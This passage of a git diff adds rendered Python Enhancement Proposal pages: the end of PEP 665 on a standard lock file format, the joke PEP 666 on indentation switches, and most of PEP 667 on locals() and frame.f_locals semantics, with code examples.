  3. Eliminate all files that are unsupported by the specified platform.
  4. +
  5. Eliminate all irrelevant edges between packages based on marker +evaluation for requires.
  6. +
  7. Raise an error if a package version is still reachable from the +root of the dependency graph but lacks any compatible file.
  8. +
  9. Verify that all packages left only have one version to install, +raising an error otherwise.
  10. +
  11. Install the best-fitting wheel file for each package which +remains.
  12. +
+
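The following condensed sketch covers steps 1–3 of that algorithm, assuming the lock file has already been parsed with a TOML parser; it uses the PyPA packaging project for marker evaluation, ignores extras and file-level platform filtering for brevity, and reachable_packages is a hypothetical helper name.

+
import tomllib
+from packaging.requirements import Requirement
+
+def reachable_packages(lock_path, environment):
+    with open(lock_path, "rb") as f:
+        lock = tomllib.load(f)
+    # Step 1: start from the root requirements in [metadata].
+    stack = [Requirement(r) for r in lock["metadata"]["requires"]]
+    seen = set()
+    while stack:
+        req = stack.pop()
+        # Step 3: prune edges whose environment markers do not apply.
+        if req.marker is not None and not req.marker.evaluate(environment):
+            continue
+        if req.name in seen:
+            continue
+        seen.add(req.name)
+        for files in lock["package"].get(req.name, {}).values():
+            for entry in files:
+                stack.extend(Requirement(r) for r in entry.get("requires", []))
+    return seen
+
+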

Installers MUST follow a deterministic algorithm to determine what the +“best-fitting wheel file” is. A simple solution for this is to +rely upon the packaging project +and its packaging.tags module to determine wheel file precedence.

+
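As one example of such a deterministic choice, candidate wheel file names can be ranked by the current interpreter’s tag priority; best_fitting_wheel is a hypothetical helper, and sys_tags() yields tags from most to least preferred.

+
from packaging.tags import sys_tags
+from packaging.utils import parse_wheel_filename
+
+def best_fitting_wheel(filenames):
+    # A lower index in sys_tags() means a more specific, preferred tag.
+    priority = {tag: i for i, tag in enumerate(sys_tags())}
+    def rank(filename):
+        _name, _version, _build, tags = parse_wheel_filename(filename)
+        return min(priority.get(tag, float("inf")) for tag in tags)
+    return min(filenames, key=rank)
+
+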

Installers MUST support installing into an empty environment. +Installers MAY support installing into an environment that already +contains installed packages (and whatever that would entail to be +supported).

+
+
+
+

(Potential) Tool Support

+

The pip team has said +they are interested in supporting this PEP if accepted. The current +proposal for pip may even +supplant the need +for pip-tools.

+

PDM has also said they would +support the PEP +if accepted.

+

Pyflow has said they +“like the idea” +of the PEP.

+

Poetry has said they would not support the PEP as-is because +“Poetry supports sdists files, directory and VCS dependencies which are not supported”. +Recording requirements at the file level, which is deliberate in order to +better reflect what can occur when it comes to dependencies, +“is contradictory to the design of Poetry”. +This also rules out exporting to this PEP’s lock file format, as +“Poetry exports the information present in the poetry.lock file into another format” +and sdists and source trees are included in poetry.lock files. +Thus there is no clean translation from Poetry’s lock file to this +PEP’s lock file format.

+
+
+

Backwards Compatibility

+

As there is no pre-existing specification regarding lock files, there +are no explicit backwards compatibility concerns.

+

As for pre-existing tools that have their own lock file, some updating +will be required. Most document the lock file name, but not its +contents. For projects which do not commit their lock file to +version control, they will need to update the equivalent of their +.gitignore file. For projects that do commit their lock file to +version control, what file(s) get committed will need an update.

+

For projects which do document their lock file format like pipenv, +they will very likely need a major version release which changes the +lock file format.

+
+
+

Transition Plan

+

In general, this PEP could be considered successful if:

+
    +
  1. Two pre-existing tools became lockers (e.g. pip-tools, PDM, +pip via pip freeze).
  2. +
  3. Pip became an installer.
  4. +
  5. One major, non-Python-specific platform supported the file format +(e.g. a cloud provider).
  6. +
+

This would show interoperability, usability, and programming +community/business acceptance.

+

In terms of a transition plan, there are potentially multiple steps +that could lead to this desired outcome. Below is a somewhat idealized +plan that would see this PEP being broadly used.

+
+

Usability

+

First, a pip freeze equivalent tool could be developed which +creates a lock file. While installed packages do not by themselves +provide enough information to statically create a lock file, a user +could provide local directories and index URLs to construct one. This +would then lead to lock files that are stricter than a requirements +file by limiting the lock file to the current platform. This would +also allow people to see whether their environment would be +reproducible.

+

Second, a stand-alone installer should be developed. As the +requirements on an installer are much simpler than what pip provides, +it should be reasonable to have an installer that is independently +developed.

+

Third, a tool to convert a pinned requirements file as emitted by +pip-tools could be developed. Much like the pip freeze equivalent +outlined above, some input from the user may be needed. But this tool +could act as a transitioning step for anyone who has an appropriate +requirements file. This could also act as a test before potentially +having pip-tools grow some --lockfile flag to use this PEP.

+

All of this could be required before the PEP transitions from +conditional acceptance to full acceptance (and give the community a +chance to test if this PEP is potentially useful).

+
+
+

Interoperability

+

At this point, the goal would be to increase interoperability between +tools.

+

First, pip would become an installer. By having the most widely used +installer support the format, people can innovate on the locker side +while knowing people will have the tools necessary to actually consume +a lock file.

+

Second, pip becomes a locker. Once again, pip’s reach would make the +format accessible for the vast majority of Python users very quickly.

+

Third, a project with a pre-existing lock file format supports at +least exporting to the lock file format (e.g. PDM or Pyflow). This +would show that the format meets the needs of other projects.

+
+
+

Acceptance

+

With the tooling available throughout the community, acceptance would +be shown via those not exclusively tied to the Python community +supporting the file format based on what they believe their users +want.

+

First, tools that operate on requirements files, like code editors, +would gain equivalent support for lock files.

+

Second, consumers of requirements files like cloud providers would +also accept lock files.

+

At this point the PEP would have permeated out far enough to be on +par with requirements files in terms of general acceptance and +potentially more if projects had dropped their own lock files for this +PEP.

+
+
+
+

Security Implications

+

A lock file should not introduce security issues but instead help +solve them. By requiring the recording of hashes for files, a lock +file is able to help prevent tampering with code since the hash +details were recorded. Relying on only wheel files means what files +will be installed can be known ahead of time and is reproducible. A +lock file also helps prevent unexpected package updates being +installed which may in turn be malicious.

+
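For instance, an installer could check a downloaded artifact against the recorded hashes.sha256 value using only the standard library; verify_sha256 is a hypothetical helper shown as a minimal sketch.

+
import hashlib
+
+def verify_sha256(path, expected):
+    # Stream the file so large wheels need not fit in memory.
+    digest = hashlib.sha256()
+    with open(path, "rb") as f:
+        for chunk in iter(lambda: f.read(1 << 16), b""):
+            digest.update(chunk)
+    return digest.hexdigest() == expected
+
+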
+
+

How to Teach This

+

Teaching of this PEP will very much be dependent on the lockers and +installers being used for day-to-day use. Conceptually, though, users +could be taught that a lock file specifies what should be installed +for a project to work. The benefits of consistency and security should +be emphasized to help users realize why they should care about lock +files.

+
+
+

Reference Implementation

+

A proof-of-concept locker can be found at +https://github.com/frostming/pep665_poc . No installer has been +implemented yet, but the design of this PEP suggests the locker is the +more difficult aspect to implement.

+
+
+

Rejected Ideas

+
+

File Formats Other Than TOML

+

JSON was briefly considered, but due to:

+
    +
  1. TOML already being used for pyproject.toml
  2. +
  3. TOML being more human-readable
  4. +
  5. TOML leading to better diffs
  6. +
+

the decision was made to go with TOML. There was some concern over +Python’s standard library lacking a TOML parser, but most packaging +tools already use a TOML parser thanks to pyproject.toml, so this +issue did not seem to be a showstopper. Others have countered this +concern by noting that if packaging tools are so averse to installing +dependencies that they cannot even vendor a package, then the +packaging ecosystem has much bigger issues to rectify than the need to +depend on a third-party TOML parser.

+
+
+

Alternative Naming Schemes

+

Specifying a directory to install files to was considered, but +ultimately rejected due to people’s distaste for the idea.

+

It was also suggested to not have a special file name suffix, but it +was decided that hurt discoverability by tools too much.

+
+
+

Supporting a Single Lock File

+

At one point the idea of only supporting a single lock file which +contained all possible lock information was considered. But it quickly +became apparent that trying to devise a data format which could +encompass both a lock file format which could support multiple +environments as well as strict lock outcomes for +reproducible builds would become quite complex and cumbersome.

+

The idea of supporting a directory of lock files as well as a single +lock file named pyproject-lock.toml was also considered. But any +possible simplicity from skipping the directory in the case of a +single lock file seemed unnecessary. Trying to define appropriate +logic for what should be the pyproject-lock.toml file and what +should go into pyproject-lock.d seemed unnecessarily complicated.

+
+
+

Using a Flat List Instead of a Dependency Graph

+

The first version of this PEP proposed that the lock file have no +concept of a dependency graph. Instead, the lock file would list +exactly what should be installed for a specific platform such that +installers did not have to make any decisions about what to install, +only validating that the lock file would work for the target platform.

+

This idea was eventually rejected due to the number of combinations +of potential PEP 508 environment markers. The decision was made that +trying to have lockers generate all possible combinations as +individual lock files when a project wants to be cross-platform would +be too much.

+
+
+

Use Wheel Tags in the File Name

+

Instead of having the metadata.tag field there was a suggestion +of encoding the tags into the file name. But due to the addition of +the metadata.marker field and what to do when no tags were needed, +the idea was dropped.

+
+
+

Alternative Names for requires

+

Some other names for what became requires were installs, +needs, and dependencies. Initially this PEP chose needs +after asking a Python beginner which term they preferred. But based +on feedback on an earlier draft of this PEP, requires was chosen +as the term.

+
+
+

Accepting PEP 650

+

PEP 650 was an earlier attempt at trying to tackle this problem by +specifying an API for installers instead of standardizing on a lock +file format (à la PEP 517). The +initial response +to PEP 650 could be considered mild/lukewarm. People seemed to be +consistently confused over which tools should provide what +functionality to implement the PEP. It also potentially incurred more +overhead as it would require executing Python APIs to perform any +actions involving packaging.

+

This PEP chooses to standardize around an artifact instead of an API +(à la PEP 621). This would allow for more tool integrations as it +removes the need to specifically use Python to do things such as +create a lock file, update it, or even install packages listed in +a lock file. It also allows for easier introspection by forcing +dependency graph details to be written in a human-readable format. +It also allows for easier sharing of knowledge by standardizing what +people need to know more (e.g. tutorials become more portable between +tools when it comes to understanding the artifact they produce). It’s +also simply the approach other language communities have taken and +seem to be happy with.

+

Acceptance of this PEP would mean PEP 650 gets rejected.

+
+
+

Specifying Requirements per Package Instead of per File

+

An earlier draft of this PEP specified dependencies at the package +level instead of per file. While this has traditionally been how +packaging systems work, it actually did not reflect accurately how +things are specified. As such, this PEP was subsequently updated to +reflect the granularity that dependencies can truly be specified at.

+
+
+

Specify Where Lockers Gather Input

+

This PEP does not specify how a locker gets its input. An initial +suggestion was to partially reuse PEP 621, but due to disagreements +on how flexible the potential input should be in terms of specifying +things such as indexes, etc., it was decided this would best be left +to a separate PEP.

+
+
+

Allowing Source Distributions and Source Trees to be an Opt-In, Supported File Format

+

After extensive discussion, +it was decided that this PEP would not support source distributions +(aka sdists) or source trees as an acceptable format for code. +Introducing sdists and source trees to this PEP would immediately undo +the reproducibility and security goals due to needing to execute code +to build the sdist or source tree. It would also greatly increase +the complexity for (at least) installers as the dynamic build nature +of sdists and source trees means the installer would need to handle +fully resolving whatever requirements the sdists produced dynamically, +both from a building and installation perspective.

+

Due to all of this, it was decided it was best to have a separate +discussion about supporting sdists and source trees after +this PEP is accepted/rejected. As the proposed file format is +versioned, introducing sdists and source tree support in a later PEP +is doable.

+

It should be noted, though, that this PEP does not stop an +out-of-band solution from being developed to be used in conjunction +with this PEP. Building wheel files from sdists and shipping them with +code upon deployment so they can be included in the lock file is one +option. Another is to use a requirements file just for sdists and +source trees, then relying on a lock file for all wheels.

+
+
+
+

Open Issues

+

None.

+
+
+

Acknowledgments

+

Thanks to Frost Ming of PDM and Sébastien Eustace of Poetry for +providing input around dynamic install-time resolution of PEP 508 +requirements.

+

Thanks to Kushal Das for making sure reproducible builds stayed a +concern for this PEP.

+

Thanks to Andrea McInnes for initially settling the bikeshedding and +choosing the paint colour of needs (at which point people rallied +around the requires colour instead).

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0665.rst

+

Last modified: 2024-07-26 12:58:25 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0666/index.html b/pep-0666/index.html new file mode 100644 index 00000000000..5f852d3cdd5 --- /dev/null +++ b/pep-0666/index.html @@ -0,0 +1,210 @@ + PEP 666 – Reject Foolish Indentation | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 666 – Reject Foolish Indentation

+
+
Author:
+
Laura Creighton <lac at strakt.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
03-Dec-2001
+
Python-Version:
+
2.2
+
Post-History:
+
05-Dec-2001
+
+
+
+
Table of Contents +
+
+

Abstract

+

Everybody agrees that mixing tabs and spaces is a bad idea. Some +people want more than this. I propose that we let people define +whatever Python behaviour they want, so it will only run the way +they like it, and will not run the way they don’t like it. We +will do this with a command line switch. Programs that aren’t +formatted the way the programmer wants things done will raise +IndentationError.

+
    +
  • python -TNone will refuse to run when there are any tabs.
  • +
  • python -Tn will refuse to run when tabs are not exactly n spaces
  • +
  • python -TOnly will refuse to run when blocks are indented by anything +other than tabs
  • +
+

People who mix tabs and spaces, naturally, will find that their +programs do not run. Alas, we haven’t found a way to give them an +electric shock as from a cattle prod remotely. (Though if somebody +finds out a way to do this, I will be pleased to add this option to +the PEP.)

+
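Purely for illustration (none of this exists, nor should it), a checker implementing two of the proposed switches might look like this hypothetical sketch:

+
def check_indentation(source, policy):
+    # policy "none" models -TNone (no tabs allowed); policy "only"
+    # models -TOnly (no spaces allowed in indentation).
+    for lineno, line in enumerate(source.splitlines(), 1):
+        indent = line[: len(line) - len(line.lstrip(" \t"))]
+        if policy == "none" and "\t" in indent:
+            raise IndentationError(f"tab used on line {lineno}")
+        if policy == "only" and " " in indent:
+            raise IndentationError(f"space indentation on line {lineno}")
+
+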
+
+

Rationale

+

Python-list@python.org (a.k.a. comp.lang.python) is periodically +awash with discussions about tabs and spaces. This is inevitable, +given that indentation is syntactically significant in Python. +This has never solved anything, and just makes various people +frustrated and angry. Eventually they start saying rude things to +each other which is sad for all of us. And it is also sad that +they are wasting their valuable time which they could spend +creating something with Python. Moreover, for the Python community +as a whole, from a public relations point of view, this is quite +unfortunate. The people who aren’t posting about tabs and spaces, +are, (unsurprisingly) invisible, while the people who are posting +make the rest of us look somewhat foolish.

+

The problem is that there is no polite way to say ‘Stop wasting +your valuable time and mine.’ People who are already in the middle +of a flame war are not well disposed to believe that you are acting +out of compassion for them, and quite rightly insist that their own +time is their own to do with as they please. They are stuck like +flies in treacle in this wretched argument, and it is self-evident +that they cannot disengage or they would have already done so.

+

But today I had to spend time cleaning my keyboard because the ‘n’ +key is sticking. So, in addition to feeling compassion for these +people, I am pretty annoyed. I figure if I make this PEP, we can +then ask Guido to quickly reject it, and then when this argument +next starts up again, we can say ‘Guido isn’t changing things to +suit the tab-haters or the only-tabbers, so this conversation is a +waste of time.’ Then everybody can quietly believe that a) they +are correct and b) other people are fools and c) they are +undeniably fortunate to not have to share a lab with idiots, (which +is something the arguers could do _now_, but apparently have +forgotten).

+

And python-list can go back to worrying if it is too smug, rather +than whether it is too hostile for newcomers. Possibly somebody +could get around to explaining to me what is the difference between +__getattr__ and __getattribute__ in non-Classic classes in 2.2, a +question I have foolishly posted in the middle of the current tab +thread. I would like to know the answer to that question [1].

+

This proposal, if accepted, will probably mean a heck of a lot of +work for somebody. But since I don’t want it accepted, I don’t +care.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0666.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0667/index.html b/pep-0667/index.html new file mode 100644 index 00000000000..e43320921e6 --- /dev/null +++ b/pep-0667/index.html @@ -0,0 +1,981 @@ + PEP 667 – Consistent views of namespaces | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 667 – Consistent views of namespaces

+
+
Author:
+
Mark Shannon <mark at hotpy.org>, +Tian Gao <gaogaotiantian at hotmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
30-Jul-2021
+
Python-Version:
+
3.13
+
Post-History:
+
20-Aug-2021, 22-Feb-2024
+
Resolution:
+
25-Apr-2024
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at locals().

+


+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

In early versions of Python, all namespaces, whether in functions, +classes or modules, were implemented the same way: as a dictionary.

+

For performance reasons, the implementation of function namespaces was +changed. Unfortunately this meant that accessing these namespaces through +locals() and frame.f_locals ceased to be consistent and some +odd bugs crept in over the years as threads, generators and coroutines +were added.

+

This PEP proposes making these namespaces consistent once more. +Modifications to frame.f_locals will always be visible in +the underlying variables. Modifications to local variables will +immediately be visible in frame.f_locals, and they will be +consistent regardless of threading or coroutines.

+

The locals() function will act the same as it does now for class +and modules scopes. For function scopes it will return an instantaneous +snapshot of the underlying frame.f_locals rather than implicitly +refreshing a single shared dictionary cached on the frame object.

+
+
+

Motivation

+

The implementation of locals() and frame.f_locals in releases up to and +including Python 3.12 is slow, inconsistent and buggy. +We want to make it faster, consistent, and most importantly fix the bugs.

+

For example, when attempting to manipulate local variables via frame objects:

+
class C:
+    x = 1
+    sys._getframe().f_locals['x'] = 2
+    print(x)
+
+
+

prints 2, but:

+
def f():
+    x = 1
+    sys._getframe().f_locals['x'] = 2
+    print(x)
+f()
+
+
+

prints 1.

+

This is inconsistent, and confusing. Worse than that, the Python 3.12 behavior can +result in strange bugs.

+

With this PEP both examples would print 2 as the function level +change would be written directly to the optimized local variables in +the frame rather than to a cached dictionary snapshot.

+

There are no compensating advantages for the Python 3.12 behavior; +it is unreliable and slow.

+

The locals() builtin has its own undesirable behaviours. Refer to PEP 558 +for additional details on those concerns.

+
+
+

Rationale

+
+

Making the frame.f_locals attribute a write-through proxy

+

The Python 3.12 implementation of frame.f_locals returns a dictionary +that is created on the fly from the array of local variables. The +PyFrame_LocalsToFast() C API is then called by debuggers and trace +functions that want to write their changes back to the array (until +Python 3.11, this API was called implicitly after every trace function +invocation rather than being called explicitly by the trace functions).

+

This can result in the array and dictionary getting out of sync with +each other. Writes to the f_locals frame attribute may not show up as +modifications to local variables if PyFrame_LocalsToFast() is never +called. Writes to local variables can get lost if a dictionary snapshot +created before the variables were modified is written back to the frame +(since every known variable stored in the snapshot is written back to +the frame, even if the value stored on the frame had changed since the +snapshot was taken).

+

By making frame.f_locals return a view on the +underlying frame, these problems go away. frame.f_locals is always in +sync with the frame because it is a view of it, not a copy of it.

+
+
+

Making the locals() builtin return independent snapshots

+

PEP 558 considered three potential options for standardising the behavior of the +locals() builtin in optimized scopes:

+
    +
  • retain the historical behaviour of having each call to locals() on a given frame +update a single shared snapshot of the local variables
  • +
  • make locals() return write-through proxy instances (similar +to frame.f_locals)
  • +
  • make locals() return genuinely independent snapshots so that +attempts to change the values of local variables via exec() +would be consistently ignored rather than being accepted in some circumstances
  • +
+

The last option was chosen as the one which could most easily be explained in the +language reference, and memorised by users:

+
    +
  • the locals() builtin gives an instantaneous snapshot of the local variables in +optimized scopes, and read/write access in other scopes; and
  • +
  • frame.f_locals gives read/write access to the local variables in all scopes, +including optimized scopes
  • +
+

This approach allows the intent of a piece of code to be clearer than it would be if both +APIs granted full read/write access in optimized scopes, even when write access wasn’t +needed or desired. For additional details on this design decision, refer to PEP 558, +especially the Motivation section and Additional considerations for eval() and exec() in optimized scopes.

+

This approach is not without its drawbacks, which are covered +in the Backwards Compatibility section below.

+
+
+
+

Specification

+
+

Python API

+
+

The frame.f_locals attribute

+

For module and class scopes (including exec() and eval() +invocations), frame.f_locals is a direct +reference to the local variable namespace used in code execution.

+

For function scopes (and other optimized scopes) +it will be an instance of a new write-through proxy type that can directly modify +the optimized local variable storage array in the underlying frame, as well as the +contents of any cell references to non-local variables.

+

The view objects fully implement the collections.abc.Mapping interface, +and also implement the following mutable mapping operations:

+
    +
  • using assignment to add new key/value pairs
  • +
  • using assignment to update the value associated with a key
  • +
  • conditional assignment via the setdefault() method
  • +
  • bulk updates via the update() method
  • +
+

Views of different frames compare unequal even if they have the same contents.

+

All writes to the f_locals mapping will be immediately visible +in the underlying variables. All changes to the underlying variables +will be immediately visible in the mapping.

+
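A small demonstration of the write-through behaviour specified here (Python 3.13 and later semantics):

+
import sys
+
+def demo():
+    x = 1
+    proxy = sys._getframe().f_locals
+    proxy["x"] = 2          # writes through to the fast local...
+    assert x == 2           # ...and is immediately visible
+    x = 3
+    assert proxy["x"] == 3  # variable changes show in the mapping
+
+demo()
+
+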

The f_locals object will be a full mapping, and can have arbitrary +key-value pairs added to it. New names added via the proxies +will be stored in a dedicated shared dictionary stored on the +underlying frame object (so all proxy instances for a given frame +will be able to access any names added this way).

+

Extra keys (which do not correspond to local variables on the underlying +frame) may be removed as usual with del statements or the pop() +method.

+

Using del, or the pop() method, to remove keys that correspond to local +variables on the underlying frame is NOT supported, and attempting to do so +will raise ValueError. +Local variables can only be set to None (or some other value) via the proxy, +they cannot be unbound completely.

+
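For example, under the final behaviour (per the Implementation Notes below, 3.13.0 initially disallowed deleting even extra keys):

+
import sys
+
+def demo():
+    x = 1
+    proxy = sys._getframe().f_locals
+    proxy["extra"] = 99
+    del proxy["extra"]      # extra keys can be removed
+    try:
+        del proxy["x"]      # real locals cannot be unbound via the proxy
+    except ValueError:
+        pass
+
+demo()
+
+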

The clear() method is NOT implemented on the write-through proxies, as it +is unclear how it should handle the inability to delete entries corresponding +to local variables.

+

To maintain backwards compatibility, proxy APIs that need to produce a +new mapping (such as copy()) will produce regular builtin dict +instances, rather than write-through proxy instances.

+

To avoid introducing a circular reference between frame objects and the +write-through proxies, each access to frame.f_locals returns a new +write-through proxy instance.

+
+
+

The locals() builtin

+

locals() will be defined as:

+
def locals():
+    frame = sys._getframe(1)
+    f_locals = frame.f_locals
+    if frame._is_optimized(): # Not an actual frame method
+        f_locals = dict(f_locals)
+    return f_locals
+
+
+

For module and class scopes (including exec() and eval() +invocations), locals() continues to return a direct +reference to the local variable namespace used in code execution +(which is also the same value reported by frame.f_locals).

+

In optimized scopes, +each call to locals() will produce an independent +snapshot of the local variables.

+
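Concretely, under this PEP:

+
def f():
+    a = 1
+    s1, s2 = locals(), locals()
+    assert s1 == s2         # equal contents...
+    assert s1 is not s2     # ...but independent snapshots
+    s1["a"] = 99
+    assert a == 1           # mutating a snapshot never affects the frame
+
+f()
+
+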
+
+

The eval() and exec() builtins

+

Because this PEP changes the behavior of locals(), the +behavior of eval() and exec() also changes.

+

Assuming a function _eval() which performs the job of +eval() with explicit namespace arguments, eval() +can be defined as follows:

+
FrameProxyType = type((lambda: sys._getframe().f_locals)())
+
+def eval(expression, /, globals=None, locals=None):
+    if globals is None:
+        # No globals -> use calling frame's globals
+        _calling_frame = sys._getframe(1)
+        globals = _calling_frame.f_globals
+        if locals is None:
+            # No globals or locals -> use calling frame's locals
+            locals = _calling_frame.f_locals
+            if isinstance(locals, FrameProxyType):
+                # Align with locals() builtin in optimized frame
+                locals = dict(locals)
+    elif locals is None:
+        # Globals but no locals -> use same namespace for both
+        locals = globals
+    return _eval(expression, globals, locals)
+
+
+

The specified argument handling for exec() is similarly updated.

+

(In Python 3.12 and earlier, it was not possible to provide locals +to eval() or exec() without also providing globals as these +were previously positional-only arguments. Independently of this +PEP, Python 3.13 updated these builtins to accept keyword arguments)

+
+
+
+

C API

+
+

Additions to the PyEval C API

+

Three new C-API functions will be added:

+
PyObject *PyEval_GetFrameLocals(void)
+PyObject *PyEval_GetFrameGlobals(void)
+PyObject *PyEval_GetFrameBuiltins(void)
+
+
+

PyEval_GetFrameLocals() is equivalent to: locals(). +PyEval_GetFrameGlobals() is equivalent to: globals().

+

All of these functions will return a new reference.

+
+
+

PyFrame_GetLocals C API

+

The existing PyFrame_GetLocals(f) C API is equivalent to f.f_locals. +Its return value will be as described above for accessing f.f_locals.

+

This function returns a new reference, so it is able to accommodate the +creation of a new write-through proxy instance on each call in an +optimized scope.

+
+
+

Deprecated C APIs

+

The following C API functions will be deprecated, as they return borrowed references:

+
PyEval_GetLocals()
+PyEval_GetGlobals()
+PyEval_GetBuiltins()
+
+
+

The following functions (which return new references) should be used instead:

+
PyEval_GetFrameLocals()
+PyEval_GetFrameGlobals()
+PyEval_GetFrameBuiltins()
+
+
+

The following C API functions will become no-ops, and will be deprecated without +replacement:

+
PyFrame_FastToLocalsWithError()
+PyFrame_FastToLocals()
+PyFrame_LocalsToFast()
+
+
+

All of the deprecated functions will be marked as deprecated in the Python 3.13 documentation.

+

Of these functions, only PyEval_GetLocals() poses any significant maintenance burden. +Accordingly, calls to PyEval_GetLocals() will emit DeprecationWarning in Python +3.14, with a target removal date of Python 3.16 (two releases after Python 3.14). +Alternatives are recommended as described in PyEval_GetLocals compatibility.

+
+
+
+
+

Summary of Changes

+

This section summarises how the specified behaviour in Python 3.13 and later +differs from the historical behaviour in Python 3.12 and earlier versions.

+
+

Python API changes

+
+

frame.f_locals changes

+

Consider the following example:

+
def l():
+    "Get the locals of caller"
+    return sys._getframe(1).f_locals
+
+def test():
+    if 0: y = 1 # Make 'y' a local variable
+    x = 1
+    l()['x'] = 2
+    l()['y'] = 4
+    l()['z'] = 5
+    y
+    print(locals(), x)
+
+
+

Given the changes in this PEP, +test() will print {'x': 2, 'y': 4, 'z': 5} 2.

+

In Python 3.12, this example will fail with an UnboundLocalError, +as the definition of y by l()['y'] = 4 is lost.

+

If the second-to-last line were changed from y to z, this would still +raise NameError, as it does in Python 3.12. +Keys added to frame.f_locals that are not lexically local variables +remain visible in frame.f_locals, +but do not dynamically become local variables.

+
+
+

locals() changes

+

Consider the following example:

+
def f():
+    exec("x = 1")
+    print(locals().get("x"))
+f()
+
+
+

Given the changes in this PEP, this will always print None +(regardless of whether x is a defined local variable in the function), +as the explicit call to locals() produces a distinct snapshot from +the one implicitly used in the exec() call.

+

In Python 3.12, the exact example shown would print 1, but seemingly +unrelated changes to the definition of the function involved could make +it print None instead (Additional considerations for eval() and exec() in optimized scopes in PEP 558 +goes into more detail on that topic).

+
+
+

eval() and exec() changes

+

The primary change affecting eval() and exec() is shown +in the “locals() changes” example: repeatedly +accessing locals() in an optimized scope will no longer +implicitly share a common underlying namespace.

+
+
+
+

C API changes

+
+

PyFrame_GetLocals change

+

PyFrame_GetLocals can already return arbitrary mappings in Python 3.12, +as exec() and eval() accept arbitrary mappings as their locals argument, +and metaclasses may return arbitrary mappings from their __prepare__ methods.

+

Returning a frame locals proxy in optimized scopes just adds another case where +something other than a builtin dictionary will be returned.

+
+
+

PyEval_GetLocals change

+

The semantics of PyEval_GetLocals() are technically unchanged, but they do change in +practice as the dictionary cached on optimized frames is no longer shared with other +mechanisms for accessing the frame locals (locals() builtin, PyFrame_GetLocals +function, frame f_locals attributes).

+
+
+
+
+

Backwards Compatibility

+
+

Python API compatibility

+

The implementation used in versions up to and including Python 3.12 has many +corner cases and oddities. Code that works around those may need to be changed. +Code that uses locals() for simple templating, or print debugging, +will continue to work correctly. Debuggers and other tools that use +f_locals to modify local variables, will now work correctly, +even in the presence of threaded code, coroutines and generators.

+
+
+

frame.f_locals compatibility

+

Although f.f_locals behaves as if it were the namespace of the function, +there will be some observable differences. +For example, f.f_locals is f.f_locals will be False for optimized +frames, as each access to the attribute produces a new write-through proxy +instance.

+

However f.f_locals == f.f_locals will be True, and +all changes to the underlying variables, by any means, including the +addition of new variable names as mapping keys, will always be visible.

+
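These identity and equality properties can be checked directly (Python 3.13 and later):

+
import sys
+
+def f():
+    fl = sys._getframe().f_locals
+    assert fl is not sys._getframe().f_locals  # a new proxy per access
+    assert fl == sys._getframe().f_locals      # same frame, equal view
+
+f()
+
+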
+

locals() compatibility

+

locals() is locals() will be False for optimized frames, so +code like the following will raise KeyError instead of returning +1:

+
def f():
+    locals()["x"] = 1
+    return locals()["x"]
+
+
+

To continue working, such code will need to explicitly store the namespace +to be modified in a local variable, rather than relying on the previous +implicit caching on the frame object:

+
def f():
+    ns = {}
+    ns["x"] = 1
+    return ns["x"]
+
+
+

While this technically isn’t a formal backwards compatibility break +(since the behaviour of writing back to locals() was explicitly +documented as undefined), there is definitely some code that relies +on the existing behaviour. Accordingly, the updated behaviour will +be explicitly noted in the documentation as a change and it will be +covered in the Python 3.13 porting guide.

+

To work with a copy of locals() in optimized scopes on all +versions without making redundant copies on Python 3.13+, users +will need to define a version-dependent helper function that only +makes an explicit copy on Python versions prior to Python 3.13:

+
if sys.version_info >= (3, 13):
+    def _ensure_func_snapshot(d):
+        return d # 3.13+ locals() already returns a snapshot
+else:
+    def _ensure_func_snapshot(d):
+        return dict(d) # Create snapshot on older versions
+
+def f():
+    ns = _ensure_func_snapshot(locals())
+    ns["x"] = 1
+    return ns
+
+
+

In other scopes, locals().copy() can continue to be called +unconditionally without introducing any redundant copies.

+
+
+

Impact on exec() and eval()

+

Even though this PEP does not modify exec() or eval() directly, +the semantic change to locals() impacts the behavior of exec() +and eval() as they default to running code in the calling namespace.

+

This poses a potential compatibility issue for some code, as with the +previous implementation that returns the same dict when locals() is called +multiple times in function scope, the following code usually worked due to +the implicitly shared local variable namespace:

+
def f():
+    exec('a = 0')  # equivalent to exec('a = 0', globals(), locals())
+    exec('print(a)')  # equivalent to exec('print(a)', globals(), locals())
+    print(locals())  # {'a': 0}
+    # However, print(a) will not work here
+f()
+
+
+

With the semantic changes to locals() in this PEP, the exec('print(a)') call +will fail with NameError, and print(locals()) will report an empty dictionary, as +each line will be using its own distinct snapshot of the local variables rather than +implicitly sharing a single cached snapshot stored on the frame object.

+

A shared namespace across exec() calls can still be obtained by using explicit +namespaces rather than relying on the previously implicitly shared frame namespace:

+
def f():
+    ns = {}
+    exec('a = 0', locals=ns)
+    exec('print(a)', locals=ns)  # 0
+f()
+
+
+

You can even reliably change the variables in the local scope by explicitly using +frame.f_locals, which was not possible before (even using ctypes to +invoke PyFrame_LocalsToFast was subject to the state inconsistency problems +discussed elsewhere in this PEP):

+
def f():
+    a = None
+    exec('a = 0', locals=sys._getframe().f_locals)
+    print(a)  # 0
+f()
+
+
+

The behavior of exec() and eval() for module and class scopes (including +nested invocations) is not changed, as the behaviour of locals() in those +scopes is not changing.

+
+
+

Impact on other code execution APIs in the standard library

+

pdb and bdb use the frame.f_locals API, and hence will be able to +reliably update local variables even in optimized frames. Implementing this +PEP will resolve several longstanding bugs in these modules relating to threads, +generators, coroutines, and other mechanisms that allow concurrent code execution +while the debugger is active.

+

Other code execution APIs in the standard library (such as the code module) +do not implicitly access locals() or frame.f_locals, but the behaviour +of explicitly passing these namespaces will change as described in the rest of +this PEP (passing locals() in optimized scopes will no longer implicitly +share the code execution namespace across calls, passing frame.f_locals +in optimized scopes will allow reliable modification of local variables and +nonlocal cell references).

+
+
+
+

C API compatibility

+
+

PyEval_GetLocals compatibility

+

